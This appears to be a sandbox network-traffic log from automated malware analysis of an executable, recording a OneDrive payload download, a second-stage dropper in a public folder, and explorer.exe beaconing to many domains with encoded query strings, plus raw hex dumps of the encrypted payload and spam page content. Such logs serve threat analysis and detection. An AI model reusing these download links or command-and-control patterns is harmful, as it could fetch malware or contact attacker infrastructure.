MYeCDJuqN9tTaohFm7HbBuMHGc07Z1a_ao6Y8ygftiGUzR3eJYoNXGl9hVEx8G2U7rX7j19zwLrXLDWLR226~GV-6LPG9CQPWUFq8Evo35105w4G~r11DYGubtnv50BGTs8K59B7uVTAMxNN6RWy0rEWTdyCyDD_~0~AWIKEKH2BGZHAD2eujp18lxXVd68Z7F


                                                                                                Session ID: 19    Source IP: 192.168.2.3    Source Port: 49861    Destination IP: 38.54.163.57    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:15:40.535789013 CEST    10176    OUT    GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:15:40.744405031 CEST    10185    IN    HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 08 Aug 2022 18:15:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 1776
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 bb c6 c9 bd cf da bc cd bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 
26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26
                                                                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;</title><meta name="keywords" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;" /><meta name="description" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&


                                                                                                Session ID: 2    Source IP: 192.168.2.3    Source Port: 49746    Destination IP: 13.107.43.12    Destination Port: 443    Process: C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data


                                                                                                Session ID: 3    Source IP: 192.168.2.3    Source Port: 49748    Destination IP: 13.107.43.12    Destination Port: 443    Process: C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data


                                                                                                Session ID: 4    Source IP: 192.168.2.3    Source Port: 49749    Destination IP: 13.107.43.13    Destination Port: 443    Process: C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data


                                                                                                Session ID: 5    Source IP: 192.168.2.3    Source Port: 49751    Destination IP: 13.107.43.13    Destination Port: 443    Process: C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data


                                                                                                Session ID: 6    Source IP: 192.168.2.3    Source Port: 49822    Destination IP: 209.17.116.163    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:14:13.788683891 CEST    10015    OUT    GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1
                                                                                                Host: www.meigsbuilds.online
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:13.910449028 CEST    10015    IN    HTTP/1.1 400 Bad Request
                                                                                                Server: openresty/1.19.9.1
                                                                                                Date: Mon, 08 Aug 2022 18:14:13 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 163
                                                                                                Connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                                                Session ID: 7    Source IP: 192.168.2.3    Source Port: 49823    Destination IP: 81.169.145.158    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:14:18.982198954 CEST    10016    OUT    GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.naturathome.info
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:19.002310991 CEST | 10017 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:14:18 GMT
                                                                                                Server: Apache/2.4.54 (Unix)
                                                                                                Location: https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt
                                                                                                Content-Length: 330
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&amp;aN68=XPUturKxIt">here</a>.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                8 | 192.168.2.3 | 49839 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                Aug 8, 2022 20:14:24.056804895 CEST | 10053 | OUT | GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1
                                                                                                Host: www.nutricognition.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:24.174422979 CEST | 10054 | IN | HTTP/1.1 403 Forbidden
                                                                                                Server: openresty
                                                                                                Date: Mon, 08 Aug 2022 18:14:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 291
                                                                                                ETag: "62f13bce-123"
                                                                                                Via: 1.1 google
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                9 | 192.168.2.3 | 49849 | 198.54.117.218 | 80 | C:\Windows\explorer.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                Aug 8, 2022 20:14:29.416650057 CEST | 10083 | OUT | GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.designgamagazine.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                0 | 192.168.2.3 | 49728 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                2022-08-08 18:12:07 UTC | 0 | OUT | GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: onedrive.live.com
                                                                                                2022-08-08 18:12:07 UTC | 0 | IN | HTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mH5njK3Y1QtIbimJzFbCrE_JDXEnExbjbVxBDZIFjebXmw79EaJlBUAJQg8a2lSk0jKy-tPU0chMYqSM0jXi-8cGNjx2a1GBrDjquvitMbc8eWJHco5I2rBTPI-ScXgjnnudSH65QTD1_9Msg8MkBuR4z6AMBXpFPY3dC7-t0HPCsGu7SJi2G7CfkzInKuP5-ICh-FkN7O4Kfuxs8jByCVg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:07 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:07 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D99AC6F
                                                                                                X-ODWebServer: eastus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 8F105B9B80CB4A57B880E6EC8CF60156 Ref B: VIEEDGE2220 Ref C: 2022-08-08T18:12:07Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:07 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                1 | 192.168.2.3 | 49737 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                2022-08-08 18:12:08 UTC | 1 | OUT | GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent:
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
                                                                                                2022-08-08 18:12:09 UTC | 1 | IN | HTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4m2hcEcRyV2JhQQBZaqRIjzQw6g-TKpbJPNuPamP3d_ftn7KVVKB28wfCFbzizb3EScW4XZrjxDHVU2nlolu0KT6p2C5WkCpqMaIKZEKYwJ0K8_25tYVzGHqkoOILcSjWIrc9QmBIPZzNFMIOwUZGN1um-6-LbSlR6g_5dmytuWc52jf4STIO2D4ciaxKqk4X3i3LdPJKMJbYct39TynP62g/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:Ue8Sgml52og=:2CbmHhTEK6PNZmJKCqUp84cYqU1uNUkruQuHtUevA0c=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:08 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:09 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D5E899F
                                                                                                X-ODWebServer: canadaeast0-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 8B9493EEB3144B558088DD3320DF0EC7 Ref B: VIEEDGE2913 Ref C: 2022-08-08T18:12:08Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:08 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                2 | 192.168.2.3 | 49746 | 13.107.43.12 | 443 | C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                2022-08-08 18:12:29 UTC | 2 | OUT | GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: 2q5ira.ph.files.1drv.com
                                                                                                Connection: Keep-Alive
                                                                                                2022-08-08 18:12:29 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: public
                                                                                                Content-Length: 176597
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                Expires: Sun, 06 Nov 2022 18:12:29 GMT
                                                                                                Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                X-MSNSERVER: PH2PPF565EA4797
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                MS-CV: b4RE8hOGWU2mJZDv2ER/Uw.0
                                                                                                X-SqlDataOrigin: S
                                                                                                CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                X-PreAuthInfo: rv;poba;
                                                                                                Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-StreamOrigin: X
                                                                                                X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 21FDDC2B2D9B44A58900E0EFD1C951D0 Ref B: VIEEDGE1416 Ref C: 2022-08-08T18:12:29Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:29 GMT
                                                                                                Connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                3 | 192.168.2.3 | 49748 | 13.107.43.12 | 443 | C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                2022-08-08 18:12:30 UTC | 29 | OUT | GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                User-Agent:
                                                                                                Host: 2q5ira.ph.files.1drv.com
                                                                                                Connection: Keep-Alive
                                                                                                2022-08-08 18:12:31 UTC | 29 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: public
                                                                                                Content-Length: 176597
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                Expires: Sun, 06 Nov 2022 18:12:30 GMT
                                                                                                Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                X-MSNSERVER: PH2PPF15A64ABD6
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                MS-CV: dfBygyJ9i06G5jgO8XruCA.0
                                                                                                X-SqlDataOrigin: S
                                                                                                CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                X-PreAuthInfo: rv;poba;
                                                                                                Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-StreamOrigin: X
                                                                                                X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 66AFC2CCFCA2402593ADA0EF4868C722 Ref B: VIEEDGE3016 Ref C: 2022-08-08T18:12:30Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:30 GMT
                                                                                                Connection: close
                                                                                                Data Ascii: v|B"("n&ntQ4I:=gM'`RSb0VdsaiLjDtNIlD5Tc~7EpWTY)>;0 MHA`*<vZ*Vc8$o[#{]~'OZd6H3n
                                                                                                2022-08-08 18:12:31 UTC58INData Raw: aa fd 29 40 57 b6 d5 76 ae 64 57 49 45 bf ca 8b cb 3e 4e 6b b0 e4 b2 bf ed d6 28 09 b7 46 9e 6b ee e9 40 5c 4c ca e2 4d c1 d2 dc bf 58 d1 e9 9a 87 c6 82 f6 de 02 6c 23 29 6b b3 0f b7 dd 56 f7 7a 7f 55 70 38 85 c1 0a 27 a4 4b f5 24 f9 9b 18 e1 57 e1 e0 8a cf 8a 78 9e 5b 9f 94 15 b5 78 de c0 e3 af c3 e9 69 b9 be 7a 9f 10 29 b6 d3 bb b8 0b d4 dc 46 59 5d 25 85 c9 84 4b 3f dc 9b de d3 f1 63 96 8e 1b 8b a6 b4 0c 2b 99 02 42 9d 66 52 7e 76 43 f8 63 52 6b 5c 41 b9 8a 75 fd dc a9 51 55 b9 d0 e7 11 44 57 a5 18 0a e3 05 f3 ec 28 0d 5c 3c 19 4a 13 c0 3b 42 2d 21 8e 0a 1b e0 cd 48 66 be 28 05 a1 6f b8 52 6d cb 67 06 1d c1 ae c9 55 46 bd 3f 7d 3f ad 8e 83 7e ef 44 60 9f 1e a4 7d d6 1b a4 dc d9 2b 45 e9 c8 17 a4 4a 15 b4 f0 0e 6c c0 1d 37 0f fc 77 3e b6 df cb 64 ba ab
                                                                                                Data Ascii: )@WvdWIE>Nk(Fk@\LMXl#)kVzUp8'K$Wx[xiz)FY]%K?c+BfR~vCcRk\AuQUDW(\<J;B-!Hf(oRmgUF?}?~D`}+EJl7w>d
                                                                                                2022-08-08 18:12:31 UTC66INData Raw: 7d f4 f1 2c 7d 68 e4 a6 d7 1f 54 92 d5 fd a1 7e 0e 71 0c 47 b7 f3 11 78 5f 82 80 04 69 34 fa a6 0b cc 62 f2 6d 63 32 92 71 6f 47 1a be 6c ca f2 d4 57 b2 aa 47 94 4a ad b0 d2 c1 e3 80 9f 9b dd d1 27 0d c1 65 43 bf 94 0f 5e 80 fd b3 d4 e8 fb d4 50 c0 64 62 2f 18 d6 9b 73 50 91 3a c3 7b 2a af 18 af 04 f9 08 5a 3c 8f 9f 6a 71 29 95 c8 01 20 d2 69 5e 7a b2 d4 f3 3a 61 10 64 8b 5b ea fe 87 22 43 3c 89 07 c1 47 f5 6f 69 ab 96 e0 1a 8c 17 ee 78 ba bb 9d 06 e3 06 c1 76 a1 84 76 30 ba 74 ca c5 6d 26 2e 07 07 71 62 4d d1 5b b6 f3 cd b4 36 e4 9d 77 67 a7 90 c9 7b 45 6e 1d 13 6c 10 90 0b 08 6a b4 fd 97 33 29 f2 69 0f af c1 ce 4a d0 b2 1d 04 67 01 8b 68 1b 6b 36 5a bf a8 74 22 c7 54 d1 4c 6b f5 42 a9 67 bf 15 89 c8 47 a1 2d 91 dc a0 25 40 bf 4f 25 e7 23 44 91 85 c7 5c
                                                                                                Data Ascii: },}hT~qGx_i4bmc2qoGlWGJ'eC^Pdb/sP:{*Z<jq) i^z:ad["C<Goixvv0tm&.qbM[6wg{Enlj3)iJghk6Zt"TLkBgG-%@O%#D\
                                                                                                2022-08-08 18:12:31 UTC74INData Raw: 97 ec 17 99 57 0a 16 e4 4c 7a 95 5f ff c2 72 9b 07 ff b9 ac 45 e9 be a4 72 c9 8d be 09 52 45 ba b8 5e a2 3f b2 ac 4e 70 76 fc 3e 4b 68 38 17 68 a5 9d 50 85 f6 96 b4 9c 97 50 a0 fe c4 8f 60 a4 45 6c 6d 9b a0 70 f9 f9 7d fd 10 af 15 5f 73 13 c9 a9 62 14 93 49 3b 31 39 b2 10 ef 4c a5 a8 13 e8 3c f4 49 18 b9 20 c8 1a c8 7d ae db 48 f0 9a 83 23 8b 81 02 75 16 29 b4 db 10 31 a1 41 da 9a ea db c4 78 a5 a5 72 56 be 76 70 55 8b fa 20 29 64 85 90 24 4a 46 e6 52 9a b8 c4 b0 7f 04 c5 ad 82 08 00 de 44 a7 5f 90 a0 9e 29 1b 14 cd 53 29 b5 d2 38 89 5d 1b 57 0e 30 00 9f 58 7a aa fb d5 14 88 f5 58 4b ef f8 26 78 2c 45 0b 0e aa d2 e8 09 c9 f2 2f f8 54 57 5d c1 7f c2 b8 a6 27 27 e1 11 54 3b 7f 12 db e3 15 fa d1 36 22 ba 48 16 02 35 db 5c e6 fc 6a 9b 37 19 c4 79 d1 12 63 12
                                                                                                Data Ascii: WLz_rErRE^?Npv>Kh8hPP`Elmp}_sbI;19L<I }H#u)1AxrVvpU )d$JFRD_)S)8]W0XzXK&x,E/TW]''T;6"H5\j7yc
